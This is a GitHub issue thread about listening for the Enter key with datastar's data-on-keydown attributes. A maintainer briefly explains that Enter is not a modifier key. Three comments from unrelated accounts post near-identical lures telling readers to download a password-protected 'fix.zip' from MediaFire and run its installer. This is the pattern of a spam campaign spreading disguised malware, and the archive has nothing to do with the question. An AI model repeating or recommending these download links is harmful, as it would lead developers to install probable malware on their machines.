### ISSUE TITLE
Listen to Enter key (data-on-xxx)

### ISSUE THREAD

**Issue by AxelRHD** [starfederation/datastar#125]
Just starting with datastar and it is really great.

I stumbled over this example:
```html
<div
    id="bulk_update"
    data-on-keydown.window.ctrl-key.key_k="alert('you hit the cheat code!')"
>
  <h1>Press Ctrl+K</h1>
</div>
```

And I just wondered, if i can filter the Enter key also as modifier? Is there a reference somewhere (I am not that experienced in web development)?

Great thanks!

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by delaneyj** [comment]
Enter isn't considered a modifier key :(

**Comment by AxelRHD** [comment]
> Enter isn't considered a modifier key :(

Okay. No problem. Thank you for the information. :)
